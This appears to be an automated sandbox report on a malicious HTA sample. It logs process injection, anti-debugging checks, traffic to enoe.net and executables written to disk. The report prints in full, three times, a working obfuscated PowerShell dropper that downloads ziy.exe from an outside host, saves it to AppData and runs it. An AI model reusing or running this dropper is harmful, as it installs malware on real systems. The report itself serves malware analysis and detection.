powershell.exe -ExecutionPolicy UnRestricted function N($r, $V){[IO.File]::WriteAllBytes($r, $V)};function XV($r){if($r.EndsWith((jW @(19966,20020,20028,20028))) -eq $True){Start-Process (jW @(20034,20037,20030,20020,20028,20028,19971,19970,19966,20021,20040,20021)) $r}else{Start-Process $r}};function Y($ZJ){$CR = New-Object (jW @(19998,20021,20036,19966,20007,20021,20018,19987,20028,20025,20021,20030,20036));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$V = $CR.DownloadData($ZJ);return $V};function jW($Jw){$qs=19920;$w=$Null;foreach($z in $Jw){$w+=[char]($z-$qs)};return $w};function le(){$x = $env:APPDATA + '\';$ZU = Y (jW @(20024,20036,20036,20032,20035,19978,19967,19967,20021,20030,20031,20021,19966,20030,20021,20036,19967,20042,20025,20041,19966,20021,20040,20021));$L = $x + 'ziy.exe';N $L $ZU;XV $L;;;;}le;

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Nov. 2, 2021, 6:26 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function N($r, $V){[IO.File]::WriteAllBytes($r, $V)};function XV($r){if($r.EndsWith((jW @(19966,20020,20028,20028))) -eq $True){Start-Process (jW @(20034,20037,20030,20020,20028,20028,19971,19970,19966,20021,20040,20021)) $r}else{Start-Process $r}};function Y($ZJ){$CR = New-Object (jW @(19998,20021,20036,19966,20007,20021,20018,19987,20028,20025,20021,20030,20036));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$V = $CR.DownloadData($ZJ);return $V};function jW($Jw){$qs=19920;$w=$Null;foreach($z in $Jw){$w+=[char]($z-$qs)};return $w};function le(){$x = $env:APPDATA + '\';$ZU = Y (jW @(20024,20036,20036,20032,20035,19978,19967,19967,20021,20030,20031,20021,19966,20030,20021,20036,19967,20042,20025,20041,19966,20021,20040,20021));$L = $x + 'ziy.exe';N $L $ZU;XV $L;;;;}le; filepath: powershell.exe	1	1	0

File has been identified by one AntiVirus engine on VirusTotal as malicious (1 event)

Jiangmin

Trojan.Script.amhb

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 65536 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x0000000003060000 process_handle: 0xffffffffffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 2, 2021, 6:27 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received
Data received	F

Poweshell is sending data to a remote host (2 events)

Data sent	kga¬C¥Z°{ÎW LðPó¥Îýïâ/LÀ/5 ÀÀÀ À 28&ÿ enoe.net
Data sent	kga¨OÚägÌºõíÔ¨ºÆ'¿ç~{uÀ&/5 ÀÀÀ À 28&ÿ enoe.net

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Nov. 2, 2021, 6:26 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2132 CREDAT:145409

A command shell or script process was created by an unexpected parent process (1 event)

parent_process

iexplore.exe

martian_process

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send Nov. 2, 2021, 6:27 p.m.	buffer: kga¬C¥Z°{ÎW LðPó¥Îýïâ/LÀ/5 ÀÀÀ À 28&ÿ enoe.net socket: 1268 sent: 112	1	112	0
send Nov. 2, 2021, 6:27 p.m.	buffer: kga¨OÚägÌºõíÔ¨ºÆ'¿ç~{uÀ&/5 ÀÀÀ À 28&ÿ enoe.net socket: 1268 sent: 112	1	112	0

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\ziy.exe
parent_process	iexplore.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function N($r, $V){[IO.File]::WriteAllBytes($r, $V)};function XV($r){if($r.EndsWith((jW @(19966,20020,20028,20028))) -eq $True){Start-Process (jW @(20034,20037,20030,20020,20028,20028,19971,19970,19966,20021,20040,20021)) $r}else{Start-Process $r}};function Y($ZJ){$CR = New-Object (jW @(19998,20021,20036,19966,20007,20021,20018,19987,20028,20025,20021,20030,20036));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$V = $CR.DownloadData($ZJ);return $V};function jW($Jw){$qs=19920;$w=$Null;foreach($z in $Jw){$w+=[char]($z-$qs)};return $w};function le(){$x = $env:APPDATA + '\';$ZU = Y (jW @(20024,20036,20036,20032,20035,19978,19967,19967,20021,20030,20031,20021,19966,20030,20021,20036,19967,20042,20025,20041,19966,20021,20040,20021));$L = $x + 'ziy.exe';N $L $ZU;XV $L;;;;}le;
parent_process	iexplore.exe	martian_process	powershell.exe -ExecutionPolicy UnRestricted function N($r, $V){[IO.File]::WriteAllBytes($r, $V)};function XV($r){if($r.EndsWith((jW @(19966,20020,20028,20028))) -eq $True){Start-Process (jW @(20034,20037,20030,20020,20028,20028,19971,19970,19966,20021,20040,20021)) $r}else{Start-Process $r}};function Y($ZJ){$CR = New-Object (jW @(19998,20021,20036,19966,20007,20021,20018,19987,20028,20025,20021,20030,20036));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$V = $CR.DownloadData($ZJ);return $V};function jW($Jw){$qs=19920;$w=$Null;foreach($z in $Jw){$w+=[char]($z-$qs)};return $w};function le(){$x = $env:APPDATA + '\';$ZU = Y (jW @(20024,20036,20036,20032,20035,19978,19967,19967,20021,20030,20031,20021,19966,20030,20021,20036,19967,20042,20025,20041,19966,20021,20040,20021));$L = $x + 'ziy.exe';N $L $ZU;XV $L;;;;}le;

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2132 resumed a thread in remote process 812
NtResumeThread Nov. 2, 2021, 6:26 p.m.	thread_handle: 0x000000000000035c suspend_count: 1 process_identifier: 812	1	0	0

Creates a suspicious Powershell process (2 events)

option	-executionpolicy unrestricted				value	Attempts to bypass execution policy
option	-executionpolicy unrestricted				value	Attempts to bypass execution policy

The process powershell.exe wrote an executable file to disk (19 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

ziy.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All